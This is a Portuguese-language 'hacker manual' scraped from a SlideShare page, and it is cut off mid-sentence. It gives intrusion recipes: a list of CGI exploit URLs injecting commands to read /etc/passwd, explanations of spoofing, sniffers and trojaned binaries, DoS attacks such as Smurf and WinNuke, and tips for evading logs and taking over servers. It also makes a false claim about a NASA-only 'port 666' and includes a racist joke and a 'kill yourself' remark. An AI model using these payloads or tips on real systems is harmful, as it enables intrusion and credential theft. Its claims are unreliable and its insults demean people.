SlideShare uma empresa Scribd logo
1 de 68
Baixar para ler offline
manual do hacker :)




=====INVASÃO PELA PORTA 666=====



MAS O QUE É ISSO?




É UMA PORTA QUE SÓ PODERIA SER USADA PELO GOVERNO AMERICANO E NASA, TANTO
QUE ELES COMUNICAM-SE POR ESTA PORTA. BOM, PARA SE CONECTAR POR ELA NÃO É
NADA FÁCIL, MAS PRECISA DE ALGUNS AJUSTES, É MAIS UMA COISA PARA PEGAR COISAS
NA CASA DE UM AMIGO SEM ELE FICAR SABENDO.



O QUE VOCÊ PRECISA:



VOCÊ PRECISA DE UM PROGRAMA CHAMADO AABOUT
(www.sites.uol.com.br/HACKERSBRASIL), E PEGUE ESTE PROGRAMA. VOCÊ PRECISA DE UM
PROGRAMA PARA ACESSAR TELNET. PARA QUEM NÃO SABE ESTE PROGRAMA FICA NO
DIRETÓRIO WINDOWS. PRONTO? JÁ TENHO TUDO AGORA? AGORA É SÓ CHAMAR UM
AMIGO PARA UMA CONVERSA PELO ICQ, OU PELO CHAT, ELE TAMBÉM DEVE TER AS DUAS
FERRAMENTAS. DEPOIS DE CHAMÁ-LO, OS DOIS DEVEM EXECUTAR O AABOUT. DEPOIS, É
SÓ ABRIR O TELNET E NO HOST COLOCAR O IP DINÂMICO DA VÍTIMA E SE CONECTAR A
PORTA 666 E NO LOGIN A PALAVRA GR!. O PONTO DE EXCLAMAÇÃO DEVE PERMANECER.
PRONTO! AGORA VOCÊ ESTARÁ EM UM PROMPT! É SÓ DAR UM DIR, E VOCÊ TEM TOTAL
CONTROLE SOBRE O PC DO CARA! TANTO CONTROLE QUE PODE CHEGAR A DAR UM
FORMAT C: , POR ISSO, SÓ FAÇA ISSO COM SEUS AMIGOS.



=====SPOOFING=====

PARA QUE VOCÊ COMPREENDA ESTE TEXTO É NECESSÁRIO QUE VOCÊ TENHA ALGUNS
CONHECIMENTOS SOBRE UNIX E PROTOCOLOS TCP/IP.



ANTES DE MAIS NADA, O SPOOFING NÃO É UM ATAQUE, E SIM PARTE DE UM. LOGO, O


                                       1
SPOOFING É UMA ESPÉCIE DE TÉCNICA DE ATAQUE, DO QUAL O HACKER PODE MASCARAR
SEU ENDEREÇO IP OU DNS, POR EXEMPLO, DIZENDO AO SISTEMA QUE ELE VAI ATACAR,
QUE ELE É CONFIÁVEL. ISSO OCORRE POR QUE AS COMUNICAÇÕES ENTRE COMPUTADORES
NA INTERNET SE BASEIA NESTES ENDEREÇOS "CONFIÁVEIS" PARA TROCAREM
INFORMAÇÕES. UMA MÁQUINA A PODE MANTER UMA COMUNICAÇÃO COM UMA
MÁQUINA B SEM QUE SEJA NECESSÁRIO VERIFICAR TODA HORA SE A INFORMAÇÃO É
AUTÊNTICA ENTRE ELAS. O HACKER, ENTÃO, PÕE UMA ESPÉCIE DE DISFARCE EM SEU PC,
DIZENDO PARA A MÁQUINA A QUE ELE É A MÁQUINA B. ASSIM, A MÁQUINA A VAI ACEITAR
TODOS OS SEUS COMANDOS E, ENTÃO, O CARA PODE FAZER TUDO O QUE QUISER NELA. OS
TIPOS MAIS COMUNS DE SPOOFING SÃO: IP-SPOOFING, DNS-SPOOFING, WEB-SPOOFING, E-
MAIL-SPOOFING ENTRE OUTROS.



COMO FOI MENCIONADO ANTERIORMENTE, NO SPOOFING O INVASOR TOMA A
IDENTIDADE DE HOST CONFIÁVEL. EM UMA REDE UNIX PODEMOS CONFIGURAR HOSTS
CONFIÁVEIS. SE UMA MÁQUINA UNIX CRIA EM SEU DIRETORIO/HOME UM ARQUIVO
CHAMADO RHOSTS COM OS NOMES DE HOSTS, LOGO QUALQUER USUÁRIO QUE TENHA O
USER ID QUE VOCÊ COLOCOU NESTE ARQUIVO PODE LOGAR-SE NA SUA CONTA USANDO O
RLOGIN.



O RLOGIN É UM PROTOCOLO BASEADO EM CLIENTE /SERVIDOR SIMPLES, QUE USA O TCP
COMO PROTOCOLO DE COMUNICAÇÃO. O RLOGIN PERMITE AO USUÁRIO LOGAR-SE
REMOTAMENTE DE UM HOST AO OUTRO. SE A MÁQUINA ALVO CONFIAR NA MÁQUINA
DESTE USUÁRIO, O RLOGIN PERMITIRÁ A CONVENIÊNCIA DE NÃO PEDIR PASSWORD. ELA
SOMENTE IRÁ AUTETICAR O CLIENTE VIA ENDEREÇO IP. ENTÃO PODEMOS EXECUTAR
COMANDOS REMOTOS COMO RSH, DESDE QUE DEDE QUE AQUELES HOSTS "CONFIÁVEIS"
ESTEJAM LISTADOS NO RHOSTS, SEM PEDIR PASSWORD. OUTRA POSSIBILIDADE É LISTAR
NOMES DE HOSTS NO ARQUIVO /ETC/HOSTS.EQUIV. NESTE CASO, QUALQUER USUÁRIO
DAS MÁQUINAS LISTADAS PODE TAMBÉM LOGAR-SE NO HOST LOCAL SEM UMA
PASSWORD.



THREE-WAY HADSHAKE: QUANDO UM HOST ENVIA UMA MENSAGEM A UM OUTRO HOST
ESTE PODE SER DIVIDIDO EM UM NÚMERO DE SEGMENTOS E REDICIONADO AO HOST
DESTINO POR TCP. O IP SOMENTE SE ENCARREGADE ROTEÁ-LO. QUANDO UMA APLICAÇÃO
EM UM CLIENTE QUER ALCANÇAR A OUTRA EM UM SERVIDOR, DEVE CONHECER A O IP DA
MÁQUINA-DESTINO E Ó NÚMERO DA PORTA TCP DESIGNADO À APLICAÇÃO, E DECIDIR
ENTÃO A CONEXÃO DESTINO. (CONEXÃO-DESTINO=DIREÇÃO IP+PORTA TCP).



PARA ESTABELECER UMA CONEXÃO, O TCP UTILIZA UM PROCEDIMENTO DENOMINADO "3-

                                      2
WAY HANDSHAKE". NESTE PROCESSO, 3 MENSAGENS (SYN, SYN/ACK y ACK) SÃO
REQUERIDAS PARA ESTABELECER A CONEXÃO. ENTRE A INFORMAÇÃO INTERCAMBIADA
ESTÁ A DIREÇÃO DE CADA MÁQUINA E O NÚMERO DE SEQUENCIA INICIAL (#SI) QUE AMBAS
UTILIZARÃO PARA ESTABELECER A COMINICAÇÃO. ESTES NÚMEROS SÃO EXCLUSIVOS PARA
A COMUNICAÇÃO ENTRE ESSAS DUAS MÁQUINAS, E SE BASEIAM NA HORA DO RELÓGIO
INTERNO DO SISTEMA. UMA VEZ ABERTA A CONEXÃO. AS DUAS MÁQUINAS JÁ
"AUTENTICADAS", ESTÃO PRONTAS PARA TROCAR DADOS.



=====ATAQUE POR MONITORAÇÃO=====

ATAQUES POR MONITORAÇÃO SÃO BASEADOS EM SOFTWARE DE MONITORAÇÃO DE REDE
CONHECIDO COMO SNIFFER, INSTALADO PELOS INVASORES. O SNIFFER GRAVA OS
PRIMEIROS 128 BYTES DE CADA SESSÃO LOGIN, TELNET E FTP SESSION VISTA NAQUELE
SEGMENTO DE REDE LOCAL COMPROMETENDO TODO O TRÁFEGO DE/PARA QUALQUER
MÁQUINA NAQUELE SEGMENTO, BEM COMO O TRÁFEGO QUE PASSAR POR AQUELE
SEGMENTO. OS NOMES CAPTURADOS INCLUEM O HOST DESTINO, O USERNAME E A
PASSWORD. A INFORMAÇÃO É GRAVADA NUM ARQUIVO POSTERIORMENTE RECUPERADO
PELO INVASOR PARA TER ACESSO A OUTRAS MÁQUINAS. EM MUITOS CASOS OS INVASORES
OBTEM ACESSO INICIAL AOS SISTEMAS USANDO UMA DAS SEGUINTES TÉCNICAS: OBTEM O
ARQUIVO DE PASSWORDS VIA FTP EM SISTEMAS IMPROPRIAMENTE CONFIGURADOS;
OBTEM O ARQUIVO DE PASSWORDS DE SISTEMAS RODANDO VERSÕES INSEGURAS DO NIS;
OBTEM ACESSO AO SISTEMA DE ARQUIVOS LOCAIS VIA PONTOS EXPORTADOS PARA
MONTAGEM COM NFS, SEM RESTRIÇÕES; USAM UM NOME DE LOGIN E PASSWORD
CAPTURADA POR UM SNIFFER RODANDO EM OUTRO SISTEMA. UMA VEZ NO SISTEMA, OS
INVASORES OBTEM PRIVILÉGIOS DE ROOT EXPLORANDO VULNERABILIDADES CONHECIDAS,
TAÇ COMO RDISTSUN SPARC INTEGER DIVISION E ARQUIVOS UTMP POSSÍVEIS DE ESCRITA
POR TODO MUNDO OU USANDO UMA PASSWORD DE ROOT CAPTURADA. ELES ENTÃO
INSTALAM O SOFTWARE SNIFFER, REGISTRANDO A INFORMAÇÃO CAPTURADA NUM
ARQUIVO INVISÍVEL.



ADICIONALMENTE, ELES INSTALAM CAVALOS DE TRÓIA EM SUBSTITUIÇÃO E UMA OU MAIS
DENTRE OS SEGUINTES ARQUIVOS DE SISTEMA, PARA OCULTAR SUA PRESENÇA:



/BIN/LOGIN



/USR/ETC/IN.TELNETD




                                      3
/USR/KVM/PS



/USR/UCB/NETSTAT




ENTENDA O BARRAMENTO DO MICRO



ISA- O BARRAMENTO SURGIU COM OS XT´S, O ISA ORIGINAIS ERAM DE 8 BITS E RODAVAM
A 4,77 MHZ. COM O ADVENTO DOS AT, VAIO O ISA DE 16 BITS QUE OPERAVAM A 8 MHZ.,
UTILIZADOS ATÉ HOJE.



POR EXEMPLO, AS FAX-MODEM POSSUEM BARRAMENTO ISA DE 8 BITS.



OS BARRAMENTOS UTILIZADOS ATUALMENTE SÃO O ISA, VESA E PCI, ESSES DOIS ÚLTIMOS
SÃO O QUE SE CHAMA DE LOCAL BUS.



SÃO CAHMADOS DE LOCAL BUS POR FUNCIONAREM EM CONEXÃO DIRETA COM A CPU.



VESA- HOJE MUITO POPULAR, NÃO CHEGA A CONSTITUIR UM BARRAMENTO NOVO, ELE É
BASICAMENTE UM ISA ALTERADO, E É UM BARRAMENTO RÁPIDO, DE 32 BITS E
FREQÜÊNCIA DE FUNCIONAMENTO DE 33 MHZ. A VELOCIDADE DE TRANSMISSÃO É DE
130MBITS/S.



=====ROUBANDO SENHAS DE SITES=====

ESTAS SENHAS PERMITEM QUE VOCÊ ENTRE EM SITES RESTRITOS QUE NECESSITAM DE
SENHA PARA ENTRAR. (NÃO FUNCIONA EM TODOS)



phf http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd php.cgi
http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd test-cgi http://xxx.xxx.xxx/cgi-bin/test-

                                              4
cgi?/etc/* query http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd faxsurvey
http://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd htmlscript
http://xxx.xxx.xxx/cgi-bin/htmlscript?../../../../etc/passwd webdist.cgi http://xxx.xxx.xxx/cgi-
bin/webdist.cgi?distloc=;cat%20/etc/passwd nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph-
test-cgi?/etc/* echo http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd view-source
http://xxx.xxx.xxx/cgi-bin/view-source?../../../../../etc/passwd pfdisplay
http://xxx.xxx.xxx/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd campas http://xxx.xxx.xxx/cgi-
bin/campas?%0acat%0a/etc/passwd%0a wrap http://xxx.xxx.xxx/cgi-
bin/wrap?/../../../../../etc whatever http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat
/etc/passwd|? data=Download xenolith http://xxx.xxx.xxx/cgi-bin/handler/xenolith;cat
/etc/passwd/| ?data=Download



Substitua o xxx.xxx.xxx pelo endereço do site



DoS

PARA COMEÇAR A ESCREVER SOBRE DoS, NADA MELHOR DO QUE EXPLICAR O QUE É ISSO.
O LAMMER VEM E DIZ: " EU SEI! É UM SISTEMA OPERACIONAU SUPER LEGAL CRIADU PELU
BIU GAYTIS, PAI DU MERCADU DI SOFITIWARE! I EU SEI TUDU DELI!" NÃO!!!!! O HACKING
NÃO SE LIMITA A MERDAS COMO DOS LAMMAH! NA VERDADE NEM SEI SE CHEGA A
INCLUIR TAMANHA BOSTA. ASSIM, DOS E DoS SÃO COISAS DIFERENTES. ENQUANTO DOS
QUER DIZER "DISK OPERATING SYSTEM", DoS QUER DIZER "DENIAL OF SERVICE". DoS É UM
ATAQUE MUITO ÚTIL, E COMO O PRÓPRIO NOME DIZ, NEGA UM DETERMINADO TIPO DE
SERVIÇO AOS USUÁRIOS, ISTO É, IMPEDE QUE ACESSEM UM DETEMINADO SERVOÇO DO
HOST.



PODE-SE TER COMO ALVO DE UM DoS DESDE O MAIS BAIXO LAYERDO TCP/IP ATÉ STACK
ATÉ O LAYER DE APLICAÇÃO, TRAVANDO O IRC DO CARA, POR EXEMPLO. COMO VEREMOS
AQUI, NÃO EXISTE UM ATAQUE DE DoS, E SIM VÁRIOS TIPOS DE ATAQUES QUE PODEM SER
CONSIDERADOS COMO DoS, CADA UM DELES ATACANDO UMA PARTE DO TCP/IP E DOS
SEUS SUBPROTOCOLOS.



A UTILIDADE? VÁRIAS! O PRÓPRIO MAIL BOMB PODE SER CLASSIFICADO COMO UM
ATAQUE DE DoS, POIS ELE ENCHE A CAIXA DO MANÉ DE MENSAGENS IMPDINDO QUE ELE
CHEQUE OU TALVEZ ATÉ TRAVANDO O POP3. OUTRO EXEMPLO É O WINNUKE, QUE ATACA
UM DRIVER DO TCP/IP E FAZ COISAS QUE VARIAM DE CAIR A CONEXÃO DO CARA ATÉ
RESETAR O MICRO DO SUJEITO. ASSIM, O DoS SURGE COMO UM NOVO CAMPO A SER
EXPLORADO, INVESTIGANDO NÃO SOMENTE FUROS DE SEGURANÇA MAS SIM FRAQUEZAS
NA MANEIRA COM QUE OS PROTOCOLOS E OS SISTEMAS OPERACIONAIS LIDAM COM

                                                5
DETERMINADOS TIPOS E QUANTIDADES DE DADOS. SE VOCÊ AINDA NÃO TOMOU UMA
NOÇÃO CLARA DO QUE SERIA DoS, OS ATAQUES ABAIXO IRÃO AJUDÁ-LO A ENTENDER.



WINNUKE



OS AFETADOS: WIN 95 (INCLUINDO OSR2), E WINDOWS NT 4.0.



QUANDO O TITIO BILL GATE$ CRIOU WINDOWS 95 E CIA, PENSOU EM COMO SERIA A
IMPLANTAÇÃO DO COMPARTILHAMENTO DE ARQUIVOS, DADA ATRAVÉS DE UM
PROTOCOLO CHAMADO NETBIOS. QUERIA QUE FOSSE ALGO PRÁTICO, CONSTANTE E SEM



DIFICULDADES PARA O USUÁRIO FINAL. POR ISSO, RESERVOU AO NETBIOS A PORTA TCP/IP
139 E DEIXOU ELE ABERTA EM TODOS OS SISTEMAS, COMO UM DEFALT. ACONTECE QUE
ACABARAM DESCOBRINDO QUE ERA POSSÍVEL FAZER UM ATAQUE DE DoS BEM
INTERESSANTE COM ESSA PORTA 139. ESTE ATAQUE CONSISTE EM MANDAR UMA
MENSAGEM OOB (OUT OF BAND) PARA ESSA PORTA E COMO O RWINDOWS NÃO SABE
LIDAR COM ESSE TIPO DE MENSAGEM, OCORRE UM ERRO NO TCP/IP DO SEU RWINDOWS,
FAZENDO APARECER PORTANTO, A FAMOSA TELA AZUL COM AS MENSAGENS DE ERRO DE
DRIVER. EMBORA SEJA MAIS COMUM WINNUKAR UMA PESSOA PELA PORTA 139, ISSO
PODE SER FEITO POR OUTRAS PORTAS RELACIONADAS AO NETBIOS (COMO 135 E 137),
DESDE QUE ESTEJAM "ESCUTANDO".



LAND



OS AFETADOS- WIN95 (INCLUINDO OSR2), WIN NT 4.0 E BSDI 2.1 E OUTROS



ENTRE OUTROS, O LINUX NÃO É AFETADO A PARTIR DO KERNEL 2.0.30



ESSE ATAQUE USA UM MECANISMO INTERESSANTE, PORÉM NÃO CAUSA DANOS
CONSIDERÁVEIS, SÓ CAUSANDO UMA CERTA LENTIDÃO POR ALGUNS INSTANTES. É O
SEGUINTE: VOCÊ MANDA VÁRIOS PACOTES DE TCP/IP COM A FLAG SYN, SPOOFADOS COM
O IP DO PRÓPRIO ALVO. A FLAG SYN É A FLAG DO TCP/IP RESPNSÁVEL POR INICIAR UMA
CONEXÃO TCP/IP, CONHECIDA COMO TRHEE WAY HANDSHAKING. ASSIM, AO RECEBER

                                        6
UMA FLAG SYN, O TCP/IP RESPONDE O CLIENTE IMEDIATAMENTE COM UM PACOTE COM
AS FLAGS SYN E ACK. O QUE O LAND FAZ É O SEGUINTE: COMO AS SYN REQUESTS ESTÃO
SPOOFADAS COM O IP DO PRÓPRIO ALVO, ESSE ALVO ACABA MANDANDO AS SYN ACK´S
PARA ELE MESMO, CAUSANDO UMA LENTIDÃO ENORME NO SISTEMA E CHEGANDO ATÉ A
TRAVÁ-LO EM ALGUMAS VARIAÇÕES. SIMPLES E EFICIENTE.



TEARDROP



AS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT E LINUX



ESSE ATAQUE TAMBÉM É MUITO FAMOSO. ELE EXPLORA UM BUG PRESENTE NO LAYER IP
(RELACIONADO À FRAGMENTAÇÃO DE DATAGRAMAS IP) DO TCP/IP STACK DOS DIFERENTES
OS´S CITADOS ACIMA. QUANDO A VÍTIMA RECEBE DETERMINADOS DADOS, SEU SISTEMA
PODE CONGELAR REPENTINAMENTE SUA CONEXÃO CAI E NO CASO DE SISTEMAS
WINDOWS PODE ATÉ SER QUE APAREÇA A FAMOSA E TEMIDA TELA AZUL, ACUSNDO UM
ERRO. ENTRETANTO, ESSE BUG NÃO CAUSA GRAVES DANOS E UM SIMPLES REBOOT IRÁ
NORMALIZAR TUDO.



VOCÊ ENCONTRARÁ MAIORES DETALHES NA BOA E VELHA ROOTSHELL
(HTTP://WWW.ROOTSHELL.COM). É SÓ DAR UM SEARCH.



SSPING/JOLT



OS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT 4.0 E ANTIGAS VERSÕES DE MAC’OS.



ESSE EXPLOITS DESENTERRA O VELHO PROBLEMA DOS SISTEMAS WINDOWS COM O
PROTOCOLO ICMP, E MAIS ESPECIFICAMENTE COM A FUNÇÃO PING. O QUE O SSPING FAZ É
QUE ELE CRIA PACOTES DE DADOS ICMP MUITO GRANDES (MAIS QUE O PERMITIDO), OS
FRAGMENTA EM VÁRIAS PARTES (PARA PODER ENVIAR) E OS ENVIA DE UMA VEZ SÓ PARA
O ALVO. QUANDO O ALVO PEGA ESSES FRAGMENTOS E TENTA REMONTAR OS PACOTES
ORIGINAIS ELE TRAVA E É PRECISO REINICIÁ-LO.




                                       7
BONK/BOINK



OS AFETADOS- WIN 95 (INCLUINDO OSR2) E WIN NT 4.0.



ESSES DOIS SÃO NA VERDADE VARIAÇÕES DO CONHECIDO TEARDROP. O BONK SERIA UM
TEARDROP QUE TRAVA MESMO MÁQUINAS PATCHEADAS. JÁ O BOINK É UMA VERSÃO
MAIS AVANÇADA DO BONK E PERMITE QUE PORTAS UDP SEJAM USADAS COMO ALVO.
ESSES FATOS SE BASEIAM NO FATO DE QUE O WINDOWS PODE TRAVAR SE RECEBER
MUITOS PACOTES UDP CORROMPIDOS. ASSIM O PROGRAMA MANDA VÁRIOS
DATAGRAMAS IP FRAGMENTADOS E NO COMPUTADOR ALVO SÃO REMONTADOS EM
PACOTES UDP INVÁLIDOS ATRAVÉS DO "OVERLAPPING BUG", TAMBÉM MUITO EXPLORADO
NO TEARDROP.



SMURF



OS AFETADOS- TODOS. ISSO MESMO! VOCÊ OUVIU BEM! T-O-D-O-S!



AGORA CHEGOU A HORA DE FALAR SOBRE UM DOS ATAQUES MAIS EFICIENTES E LOUCOS.
O SMURF! A SIMPLICIDADE DESSE ATAQUE CHEGA A IMPRESSIONAR QUANDO SE OBSERVA
OS DANOS QUE PODEM SER CAUSADOS. ENTRE TODOS OS DoS DESCRITOS ATÉ AQUI, ESSE É
O PRIMEIRO QUE NÃO ENVOLVE APENAS DOIS COMPUTADORES: O INVASOR E A VÍTIMA,
MAIS SIM CENTENAS, ATÉ MILHARES DE HOSTS, CONTRA APENAS UM SÓ!! DEVASTADOR!!



O QUE O SMURF FAZ É QUE ELE MANDA UM BROADCAST DE PACOTES ICMP (MANDA PARA
VÁRIOS ENDEREÇOS, CONTIDOS EM UMA LISTA A SER CRIADA POR VOCÊ) SÓ QUE COM O
ENDEREÇO DE ORIGEM SPOOFADO COM O IP DA VÍTIMA. ASSIM, TODOS OS
COMPUTADORES QUE FORAM PINGADOS IRÃO RESPONDER UNICAMENTE PARA ESSE
COMPUTADOR VÍTIMA.



POR EXEMPLO: SE VOCÊ MANDA UM PING PRA 1000 COMPUTADORES E ESSE PING TEM
COMO IP DE ORIGEM O IP DA VÍTIMA, ESSE COITADO IRÁ RECEBER NADA MAIS NADA
MENOS DO QUE 1000 PACOTES ICMP DE RESPOSTA!!!!! QUASE AO MESMO TEMPO!!! ISSO
SIMPLESMENTE DETONA COM O MICRO DO CARA E TRAVA ELE TOTALMENTE, TENDO QUE
SER REINICIADO.


                                        8
FINGER DoS



OS QUE ESTÃO RODANDO FINGER UNPATCHEADO



PARA QUEM NÃO SABE, FINGER É UM SERVIÇO MUITO PRESENTE EM SISTEMA
MULTIUSUÁRIO (ESPECIALMENTE SISTEMAS UNIX) QUE MOSTRA QUEM ESTÁ LOGADO NO
SISTEMA, SEUS LOGINS, TERMINAIS QUE ESTÃO UTILIZANDO, TEMPO QUE ESTÃO LOGADOS,
ETC. É BEM ÚTIL NA OBTENÇÃO DE INFORMAÇÃO PARA UMA HACKEADA, MAS NÃO É DISSO
QUE ESTAMOS FALANDO AGORA.



O FINGER OPERA NA PORTA 79 E FUNCIONA NO ESQUEMA REQUEST-ANSWER. ASSIM,
VOCÊ FAZ UM FINGER REQUEST PARA O FINGERD DE UM HOST E ESTE HOST TE RESPONDE,
DE ACORDO COM A REQUEST QUE FOI FEITA.



SE VOCÊ QUISER SABER QUEM ESTÁ LOGADO NO SISTEMA VOCÊ DÁ O COMANDO
FINGER@SISTEMA .COM.BR E LOGO VERÁ UMA LISTA DE USUÁRIOS LOGADOS.



SE QUISER SABER INFORMAÇÕES SOBRE UM DETERMINADO USUÁRIO VOCÊ DÁ O
COMANDO FINGER USUÁRIO@SISTEMA.COM.BR.



O ATAQUE CONSITE EM VÁRIOS REQUESTS ENVIADOS RAPIDAMENTE PARA O ALVO.
USUÁRIO@@@@@@@@@@SISTEMA.COM.BR.



CADA @ QUE VOCÊ COLOCOU REPRESENTA UM REQUEST E LOGO ASSIM, O COMPUTADOR
DA VÍTIMA SOFRERÁ UM FLOOD DE REQUESTS, O QUE DIMINUIRÁ O DESEMPENHO.
(NUNCA SOUBE DE NENHUM TRAVAMENTO OCASIONADO POR ESTE ATAQUE).



ENTÃO É SEGUINTE MANO! SE VOCÊ TEM NEURÔNIOS O SUFICIENTE EM SEU CÉREBRO
PERCEBEU QUE O WIN 95 E NT SÃO AS VÍTIMAS DE QUASE TODOS OS ATAQUES LISTADOS
AQUI. E NÃO PENSE QUE ESSES SÃO TODOS, POIS EXISTEM MUITOS OUTROS QUE ESTÃO
SENDO CRIADOS NO MOMENTO. DoS É AGORA, COMO JÁ MENCIONEI ANTES, UM CAMPO A


                                      9
SER EXPLORADO PELOS HACKERS.



SNIFFER

O SEGUINTE DOCUMENTO VISA AUXILIAR ADMINISTRADORES A COMPREENDER
PROBLEMAS RELACIONADOS COM SNIFFING E AS POSSÍVEIS SOLUÇÕES. A AÇÃO DOS
SNIFFERS É ATUALMENTE UM DOS PRINCIPAIS PROBLEMAS DE SEGURANÇA.



O QUE É O SNIFFER E COMO ELE FUNCIONA?



COMPUTADORES EM REDE COMPARTILHAM CANAIS DE COMUNICAÇÃO. ISSO É
OBVIAMENTE MUITO MAIS BARATO DO QUE PASSAR UM CABO EM CADA PAR DE
COMPUTADORES PARA FAZER AS CONEXÕES. NESTES CANAIS COMPARTILHADOS,
COMPUTADORES PODEM RECEBER INFORMAÇÕES ENVIADAS A OUTROS COMPUTADORES.
A AÇÃO DE CAPTURAR INFORMAÇÕES DESTINADAS A OUTROS COMPUTADORES É
CHAMADA SNIFFING.



O PADRÃO ETHERNET ENVIA UM PACOTE PARA TODAS AS MÁQUINAS EM UM MESMO
SEGMENTO. O CABEÇALHO DO PACOTE CONTÉM O ENDEREÇO DA MÁQUINA DESTINO.
SUPÕEM-SE QUE SOMENTE A MÁQUINA QUE TENHA O ENDEREÇO CONTIDO NO PACOTE
RECEBA-O. DIZ-SE QUE UM COMPUTADOR ESTÁ EM MODO PROMÍSTUO QUANDO O
MESMO CAPTURA TODOS OS PACOTES, INDEPENDENTEMENTE DE SEREM OU NÃO
DESTINADOS A ELE.



EM UM AMBIENTE DE REDE NORMAL, OS NOMES E AS SENHAS DOS USUÁRIOS SÃO
PASSADAS ATRAVÉS DA REDE EM CLARO, OU SEJA, TEXTO NÃO CRIPTOGRAFADO. NÃO É
DIFÍCIL, PORTANTO, UM INTRUSO UTILIZANDO UMA MÁQUINA COM INTERFACE DE REDE
EM MODO PROMÍSTUO, OBTER QUALQUER SENHA, INCLUSIVE A DO ROOT, UTILIZANDO
UM SNIFFER.



DICAS DE ÉTICA HACKER

DESCOBRIU ALGO NOVO, OLHE.

NÃO APAGUE. PENSE NO QUE SERIA MELHOR: TER ACESSO A PROVEDOR OU DETONÁ-LO?




                                         10
NÃO MODIFIQUE NADA, A MENOS QUE QUER QUE SAIBAM QUE ESTEVE LÁ.

NUNCA TENTE UM SU ROOT DIRETO. ISSO FICA LOGADO.

NÃO FIQUE USANDO TELNET OU PEGANDO E-MAIL USANDO ACESSO DOS OUTROS.

NUNCA SUBESTIME UM SYSOP.

ESCOLHA HORAS ENTRE 0:30 E 6:00.

UMA VEZ LÁ DENTRO TENTE DOMINAR O LUGAR, MAS COM CAUTELA.

NÃO COFIE EM NINGUÉM.

SE PEGAR A SENHA DO ROOT DE UM PROVEDOR DE ACESSO E NÃO SABE O QUE FAZER,
MATE-SE!

NÃO TESTE VÍRUS NO PRÓPRIO HD.

É BOM PREPARAR MUITO BEM UM A ESTRATÉGIA ANTES DE ATACAR.

USE OS COMPUTADORES DE SUA UNIVERSIDADE (É MAIS SEGURO)

NÃO FIQUE DISTRIBUINDO INFORMAÇÕES SOBRE O QUE VOCÊ PEGOU.

NÃO TENHA PENA DE NINGUÉM.

VOCÊ USA MS-DOS, LINUX, WINDOWS OU UNIX? NÃO CONTE A NINGUÉM...

NÃO CRIE LAÇOS AFETIVOS COM A VÍTIMA.

APRENDA O MÁXIMO QUE PUDER COM QUEM SABE MAIS! NÃO SE META A BESTA DIRETO!



MAIS DICAS

CONHEÇA A FUNDO OS SOSTEMAS OPERACIONAIS COMO O WINDOWS, LINUX E UNIX,
WINDOWS NT. COM ELES É QUE VOCÊ IRÁ ENTENDER COMO QUEBRAR A SEGURANÇA OU
ENTÃO COMO FUNCIONA A SEGURANÇA, É MAIS DIFÍCIL, MAIS NÃO IMPOSSÍVEL.



APRENDA UMA LINGUAGEM DE PROGRAMAÇÃO COMO VISUAL BASIC OU C. VOCÊ
ESCREVENDO PEQUENOS PROGRAMINHAS PODE DEIXAR UM PROGRAMA RODANDO EM
PARALELO PARA DESCOBRIR SENHAS DE ACESSO.



APRENDA A USAR O COMANDO TELNET DO UNIX PARA SE LOGAR EM MÁQUINAS
REMOTAMENTE E COPIAR AQUELE PROGRAMA OCULTO QUE FALTA PARA VOCÊ ENTRAR

                                        11
NOO SISTEMA OU ENTÃO CADASTRAR UM USUÁRIO FANTASMA PARA ENTRAR NO SITEMA.



APRENDA COMO FUNCIONAM AS REDES E QUAIS OS TIPOS DE REDES QUE EXISTEM. HOJE
EM DIA, A MAIORIA DOS COMPUTADORES ESTÃO INTERLIGADOS E VOCÊ CONHECENDO A
ARQUITETURA E PROTOCOLOS USADOS FACILITA BASTANTE O ACESSO.



APRENDA O PROTOCOLO TCP/IP, QUE É USADO HOJE EM DIA NA INTERNET. ISSO SE VOCÊ
QUISER SER UM HACKER DA NET.



DIAL UP

DEVIDO A UMA ENORME QUANTIDADE DE BUGS E UMA CAPACIDADE DE PROTEÇÃO QUE
PERMITE QUE QUALQUER PESSOA INVADA UM MICRO QUE UTILIZE A REDE DIAL UP, COM
UMA CONEXÃO PPP, O WINDOWS É UM DOS MAIORES MOTIVOS DE PIADAS ENTRE OS
PORTUGUESES, NEGROS E O RUBINHO BARRICHELO. MESMO QUE VOCÊ NÃO ESTEJA
UTILIZANDO O COMPARTILHAMENTO DE ARQUIVOS, QUALQUER PESSOA PODE INVADIR
SEU COMPUTADOR SE VOCÊ ESTIVER FAZENDO ESTE TIPO DE CONEXÃO.



PARA ESTA "RECEITA DE BOLO" FUNCIONAR, VOCÊ TEM QUE ESTAR USANDO A REDE DIAL
UP E UMA CONEXÃO PPP. ANTES DE TUDO VERIFIQUE SE VOCÊ POSSUI OS DRIVERS
CLIENTES DA MICROSOFT. CASO NÃO ESTEJA, INSTALE-OS ATRAVÉS DO PAINEL DE
CONTROLE NO ÍCONE REDE. VERIFIQUE TAMBÉM, SE O COMPARTILHAMENTO DE
ARQUIVOS E IMPRESSORAS ESTÁ INSTALADO.



CONFIGURAR ESTAS OPÇÕES É SIMPLES. VÁ AO PAINEL DE CONTROLE E ABRA REDE.
VERIFIQUE AS PROPRIEDADES DO TCP/IP. ALPI VOCÊ ENCONTRARÁ A OPÇÃO PARA ATIVAR
A RESOLUÇÃO WINS. NO CASO DE VOCÊ NÃO CONHECER NENHUM SERVIDOR WINS,
204.118.34.6 COMO PRIMÁRIO E 204.118.34.11 COMO SECUNDÁRIO. ESSES SERVIDORES
SÃO SO USA E GRATUÍTOS. CASO QUEIRA OUTROS ENDEREÇOS, UTILIZE UM DOS
MECANISMOS DE BUSCA DA INTERNET. PARA CONFIGURAR O LMHOSTS VOCÊ PRECISA
CRIAR UM ARQUIVO TEXTO SIMPLES, COM O NOME DE LMHOSTS. NESSE ARQUIVO É ONDE
FICARÃO OS ENDEREÇOS DE IP E OS NOMES DOS COMPTADORES ACESSADOS. PARA
LOCALIZAR DETERMINADO COMPUTADOR VOCÊ DIGITA O SEU NÚMERO DE IP E A SEGUIR
